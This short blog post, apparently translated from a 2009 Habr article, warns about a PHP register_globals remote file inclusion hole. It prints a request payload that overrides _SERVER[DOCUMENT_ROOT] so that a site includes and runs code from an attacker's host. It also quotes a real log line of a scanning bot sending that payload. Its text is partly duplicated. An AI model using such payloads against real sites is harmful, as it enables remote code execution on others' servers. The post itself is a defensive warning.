hacking with register_globals
Recently I got acquainted with a relatively new hack idea for the included register_globals:
if the code has
It is enough for us to pass a line like: "/?_SERVER[DOCUMENT_ROOT_UR==http://hacksite/hackcode.txt?" That there was a substitution and performance of our script on a consumer site.
The moral of this fable is old: be careful and do not allow to form any request through the transmitted parameters.
UPD: I’ll clarify that there is already a bot to scan for a similar vulnerability, and this log is real, only the site from which this log is taken is changed, so this is not just a theoretical vulnerability.
if the code has
include_once($_SERVER['DOCUMENT_ROOT']."file.php") thenIt is enough for us to pass a line like: "/?_SERVER[DOCUMENT_ROOT_UR==http://hacksite/hackcode.txt?" That there was a substitution and performance of our script on a consumer site.
41.210.32.69 - - [15/Feb/2009:16:32:00 +0300] "POST /?_SERVER[DOCUMENT_ROOT]=http://fakomaster.freehostia.com/bad.txt? HTTP/1.0" 200 22054 "http://www.mysite.ru//?_SERVER[DOCUMENT_ROOT]=http://fakomaster.freehostia.com/bad.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"The moral of this fable is old: be careful and do not allow to form any request through the transmitted parameters.
UPD: I’ll clarify that there is already a bot to scan for a similar vulnerability, and this log is real, only the site from which this log is taken is changed, so this is not just a theoretical vulnerability.
')
Source: https://habr.com/ru/post/52050/
All Articles